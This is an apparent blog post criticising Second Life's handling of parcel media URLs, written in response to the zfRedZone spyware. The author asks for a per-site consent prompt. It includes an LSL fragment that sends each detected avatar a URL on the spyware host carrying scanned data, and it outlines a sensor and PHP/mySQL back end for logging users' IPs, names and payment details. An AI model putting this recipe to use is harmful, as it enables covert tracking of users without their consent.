I have mentioned that zfRedZone spyware works by exploiting a security hole in the Second Life client software. The hole is this: It is possible to write a script that delivers a specific parcel media URL to a specific detected avatar. The makers of Second Life felt that users would like the ability to write scripts that would allow other users to select an audio or video stream they like and to watch or listen to this on a sim whilst other users could view different content. You can see how this is useful. When I was last at the ISM, they used this to deliver a selection of very interesting videos.
But then people got paranoid. Because if a mere user is allowed to actually see the parcel media URL that is delivering them content, what is to keep them in world in a sim where they frequently crash, and where videos must then be restarted from the beginning? Why wouldn’t they just fire up this URL in a streaming media client on their computers?
So to keep people in world, the URLs had to be hidden. We are not supposed to know who is feeding us the content. There are some fairly simple ways to discover the URLs, but the second life client does not tell us. And that is a key failing.
The other key failing is there is no security warning for parcel media. You are being redirected to an external site that Linden Labs makes quite clear in their TOS is outside of their control. You are being delivered content from that site, and yet your options are on or off. What is missing from the Second Life client is an option that says “The site isellsl.ath.cx would like to deliver you parcel media. Would you like to accept”?
If we had such an option, we would see at once the highly suspicous nature of the URL isellsl.ath.cx sends us, and we could then use a no option to ignore the “content”. Indeed a “never for this site” option would be more secure. This would also protect us from copycat sites, whilst still allowing us to enjoy the Second Life experience as it was intended.
So Linden Labs and other client developers: how about it? I will immediately change to whichever SL client offers me this option.
Although if Phoenix Viewer did it, I suspect the developers might find themselves under attack from Linden Labs for revealing those “secret” parcel media URLs.
Anyway, for interest, the code to exploit the parcel media bug looks like this:
for (agentNum=0; agentNum<num_detected; agentNum++)
key thisKey = llDetectedKey(agentNum);
string myurl="http://isellsl.ath.cx/rz2.php?e=pscan&n=" ;
string myurl+=secretsauce(thiskey) ;
// The rest of the URL contains the data gathered from a sensor.
// I don't include all the code for doing so. You need the dataserver.
llParcelMediaCommandList([PARCEL_MEDIA_COMMAND_AGENT, thisKey, PARCEL_MEDIA_COMMAND_URL, myurl]);
Now add a sensor script that finds everyone nearby and delivers each one of them a custom URL using the information you just scanned from them (UUID, payment information, avatar age and of course name) and with a PHP back end that funnels the data into a mySQL database, and you have just written your own version of RedZone. The HTTP GET request will provide you with User Agent string and IP address – and even a cookie if you try hard enough. Of course you then need to convince lots of people to gather data for you – and if possible to pay for that privelege. To do that part you have to be both greedy and amoral though, so I presume no reader of this blog would do such a thing.